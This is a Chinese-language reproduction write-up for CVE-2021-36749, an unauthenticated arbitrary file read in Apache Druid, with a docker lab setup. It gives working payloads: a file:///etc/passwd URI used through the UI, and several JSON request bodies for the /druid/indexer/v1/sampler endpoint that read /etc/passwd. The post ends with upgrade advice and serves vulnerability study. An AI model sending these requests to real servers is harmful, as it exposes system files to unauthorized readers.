首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Timeline Sec >CVE-2021-36749: Apache Druid任意文件读取复现

CVE-2021-36749: Apache Druid任意文件读取复现

作者头像
Timeline Sec
发布2022-02-11 13:58:31
1.4K0
发布2022-02-11 13:58:31
举报

本文字数:1667

阅读时长:5~6min

声明:仅供学习参考使用,请勿用作违法用途,否则后果自负

0x01 简介

Apache Druid 是一个集时间序列数据库、数据仓库和全文检索系统特点于一体的分析性数据平台。

0x02 漏洞概述

Apache Druid对用户指定的HTTP InputSource没有做限制,并且Apache Druid默认管理页面是不需要认证即可访问的。因此未经授权的远程攻击者可以通过构造恶意参数读取服务器上的任意文件。

0x03 影响版本

Apache Druid <= 0.21.1

0x04 环境搭建

创建docker-compose.yml,内容如下:

docker-compose.yml

version: "2.2"

volumes:
  metadata_data: {}
  middle_var: {}
  historical_var: {}
  broker_var: {}
  coordinator_var: {}
  router_var: {}

services:
  postgres:
    container_name: postgres
    image: postgres:latest
    volumes:
      - metadata_data:/var/lib/postgresql/data
    environment:
      - POSTGRES_PASSWORD=FoolishPassword
      - POSTGRES_USER=druid
      - POSTGRES_DB=druid
  # Need 3.5 or later for container nodes
  zookeeper:
    container_name: zookeeper
    image: zookeeper:3.5
    environment:
      - ZOO_MY_ID=1

  coordinator:
    image: apache/druid:0.21.1
    container_name: coordinator
    volumes:
      - ./storage:/opt/data
      - coordinator_var:/opt/druid/var
    depends_on: 
      - zookeeper
      - postgres
    ports:
      - "8081:8081"
    command:
      - coordinator
    env_file:
      - environment
  broker:
    image: apache/druid:0.21.1
    container_name: broker
    volumes:
      - broker_var:/opt/druid/var
    depends_on: 
      - zookeeper
      - postgres
      - coordinator
    ports:
      - "8082:8082"
    command:
      - broker
    env_file:
      - environment
  historical:
    image: apache/druid:0.21.1
    container_name: historical
    volumes:
      - ./storage:/opt/data
      - historical_var:/opt/druid/var
    depends_on: 
      - zookeeper
      - postgres
      - coordinator
    ports:
      - "8083:8083"
    command:
      - historical
    env_file:
      - environment
  middlemanager:
    image: apache/druid:0.21.1
    container_name: middlemanager
    volumes:
      - ./storage:/opt/data
      - middle_var:/opt/druid/var
    depends_on: 
      - zookeeper
      - postgres
      - coordinator
    ports:
      - "8091:8091"
    command:
      - middleManager
    env_file:
      - environment
  router:
    image: apache/druid:0.21.1
    container_name: router
    volumes:
      - router_var:/opt/druid/var
    depends_on:
      - zookeeper
      - postgres
      - coordinator
    ports:
      - "8888:8888"
    command:
      - router

再在同级目录下创建名为environment的文件,内容如下 environment

# Java tuning
DRUID_XMX=1g
DRUID_XMS=1g
DRUID_MAXNEWSIZE=250m
DRUID_NEWSIZE=250m
DRUID_MAXDIRECTMEMORYSIZE=6172m

druid_emitter_logging_logLevel=debug

druid_extensions_loadList=["druid-histogram", "druid-datasketches", "druid-lookups-cached-global", "postgresql-metadata-storage"]

druid_zk_service_host=zookeeper

druid_metadata_storage_host=
druid.javascript.enabled = true
druid_metadata_storage_type=postgresql
druid_metadata_storage_connector_connectURI=jdbc:postgresql://postgres:5432/druid
druid_metadata_storage_connector_user=druid
druid_metadata_storage_connector_password=FoolishPassword

druid_coordinator_balancer_strategy=cachingCost

druid_indexer_runner_javaOptsArray=["-server", "-Xmx1g", "-Xms1g", "-XX:MaxDirectMemorySize=4g", "-Duser.timezone=UTC", "-Dfile.encoding=UTF-8", "-Djava.util.logging.manager=org.apache.logging.log4j.jul.LogManager"]
druid_indexer_fork_property_druid_processing_buffer_sizeBytes=268435456

druid_storage_type=local
druid_storage_storageDirectory=/opt/data/segments
druid_indexer_logs_type=file
druid_indexer_logs_directory=/opt/data/indexing-logs

druid_processing_numThreads=2
druid_processing_numMergeBuffers=2

DRUID_LOG4J=<?xml version="1.0" encoding="UTF-8" ?><Configuration status="WARN"><Appenders><Console name="Console" target="SYSTEM_OUT"><PatternLayout pattern="%d{ISO8601} %p [%t] %c - %m%n"/></Console></Appenders><Loggers><Root level="info"><AppenderRef ref="Console"/></Root><Logger name="org.apache.druid.jetty.RequestLog" additivity="false" level="DEBUG"><AppenderRef ref="Console"/></Logger></Loggers></Configuration>

执行docker-compose up -d后,访问8081端口即可

0x05 漏洞复现

方法一(推荐)

点击load data。选择http(s):// ,点击connect data

URIs填写file:///etc/passwd,然后点击load按钮,页面直接回显

方法二(load Data无法点击时可以试试)

向接口/druid/indexer/v1/sampler以POST请求的方式发送以下数据。

{
  "type": "index",
  "spec": {
    "ioConfig": {
      "type": "index",
      "inputSource": {
        "type": "local",
        "baseDir": "/etc/",
        "filter": "passwd"
      },
      "inputFormat": {
        "type": "json",
        "keepNullColumns": true
      }
    },
    "dataSchema": {
      "dataSource": "sample",
      "timestampSpec": {
        "column": "timestamp",
        "format": "iso",
        "missingValue": "1970"
      },
      "dimensionsSpec": {}
    }
  },
  "type": "index",
  "tuningConfig": {
    "type": "index"
  }
},
  "samplerConfig": {
    "numRows": 500,
    "timeoutMs": 15000
  }
}

或者(firehose 老版本使用 大概0.15.0左右)

{
        "type": "index",
        "spec": {
          "ioConfig": {
            "type": "index",
            "firehose": {
              "type": "local",
              "baseDir": "/etc/",
              "filter": "passwd"
            }
          },
          "dataSchema": {
            "dataSource": "sample",
            "parser": {
              "parseSpec": {
                "format": "json",
                "timestampSpec": {},
                "dimensionsSpec": {}
              }
          }
        }
      },
        "samplerConfig": {
          "numRows": 500,
          "timeoutMs": 15000
        }
      }

或者(网传payload)

{
        "type": "index",
        "spec": {
          "type": "index",
          "ioConfig": {
            "type": "index",
            "firehose": {
              "type": "http",
              "uris": ["file:///etc/passwd"]
            }
          },
          "dataSchema": {
            "dataSource": "sample",
            "parser": {
              "type": "string",
              "parseSpec": {
                "format": "regex",
                "pattern": "(.*)",
                "columns": ["a"],
                "dimensionsSpec": {},
                "timestampSpec": {
                  "column": "!!!_no_such_column_!!!",
                  "missingValue": "2010-01-01T00:00:00Z"
                }
              }
            }
          }
        },
        "samplerConfig": {
          "numRows": 500,
          "timeoutMs": 15000
        }
      }

0x06 修复方式

升级至Apache Druid 0.22.0及以上版本

https://github.com/apache/druid/

参考链接:

https://www.freebuf.com/vuls/263276.html https://druid.apache.org/docs/latest/tutorials/docker.html

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2022-01-15,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Timeline Sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
关于作者
Timeline Sec
目录
  • 方法一(推荐)
  • 方法二(load Data无法点击时可以试试)
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档